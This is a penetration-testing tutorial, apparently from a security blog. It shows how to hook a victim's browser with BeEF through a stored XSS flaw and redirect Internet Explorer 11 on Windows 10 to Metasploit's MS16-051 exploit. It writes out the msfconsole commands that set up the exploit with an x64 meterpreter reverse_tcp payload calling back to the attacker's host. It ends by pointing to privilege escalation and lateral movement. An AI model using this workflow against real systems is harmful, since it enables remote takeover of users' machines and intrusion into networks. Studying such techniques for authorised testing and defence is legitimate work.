The beEF Browser Exploitation Framework is a useful tool for browser exploitation. It can be used to hook a victim's browser. From there, we can perform all sorts of malicious actions against the browser. In the last article we integrated metasploit with beEF. Now we will be using our newly integrated framework to redirect a victim's browser to a metasploit exploit. In this case we will be using MS16_051 to exploit Internet Explorer 11 on Windows 10 x64.
To begin we need to fire up beEF and metasploit like we did in the last article.
service postgresql start && msfconsole
msf> load msgrpc ServerHost=10.1.100.131 Pass=abc123 SSL=y
cd /usr/share/beef-xss && ./beef
Now we can access the beEF user interface
Hooking the Browser
Let's say James logs in to an interface for employees to exchange emails and attachments which is exposed to the internet. The authentication form contains a stored XSS vulnerability. The attacker would simply inject a malicious XSS redirect into the authentication form so that then next time James visits the page, his browser is redirected to beEF's hook.js.
Upon visiting the page, his browser will be silently redirected to our browser hook. Once hooked, we should see it appear in the 'Online Browsers' tab, as well as in the beEF output in the console you started it.
As you can see there's a lot of information displayed on the 'Details' page about the victim's browser and operating system. In this case, we can see that the victim is running IE 11 on Windows 10. That's good to know. There happens to be a browser exploit module matching that name and version.
Preparing the Exploit
In order to actually make this work, we will need to set the exploit up in msfconsole.
msf> use exploit/windows/browser/ms16_051_vbscript
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> set SRVHOST 10.1.100.131
msf> set LHOST 10.1.100.131
msf> set URIPATH hax (to simplify adding to beEF)
Here we select the exploit, set the appropriate payload (making sure to use the x64 meterpreter shell to match the target), set the listen and server host to our address where the exploit is. The URIPATH is the path of the actual browser exploit. If left alone this would be set to a random string. I chose to set it to hax because it's simple to type and remember. Once we run the 'exploit' command, the listener will start.
Once the exploit starts, it will be hosted at http://10.1.100.131:8080/hax. This is where we will need to redirect the victim's browser.
So, we've hooked the browser, and prepared our exploit. There's a few ways we can get the exploit to run. The first way is to find the exploit in beEF, make the settings match the exploit we ran in msfconsole above, and fire it at the victim.
Once the exploit has been executed you will see a message from beEF in the console you started it in saying that the exploit has been sent to the target, as well as the exploit interacting with the victim in msfconsole. The exploit takes some time, but eventually we receive a meterpreter session on the victim. Now you have a foothold into the target network. From here you can escalate privileges and move laterally throughout the network.
Sometimes I've found that method to be less then reliable. If this is the case, you can always use beEF's browser redirect capability to send the victim straight to the exploit hosted on your server.
Once this is executed, the user should be redirected to the exploit and you should be granted a meterpreter session. Keep in mind, this method is not very stealthy as the victim will be able to see their browser being redirected. You can get a general idea of how well a module will perform based on the color next to it. Read the 'Getting Started' page for more details.
This has been a quick example of gaining a foothold into a network by exploiting a user's browser inside the network. Doing this may allow you to create an entry point into a seemingly impenetrable network. This attack was carried out against a Windows 10 machine running IE 11, however, due to the nature of technology, current builds of Windows 10 an Internet Explorer may not be vulnerable in the same way, or at all.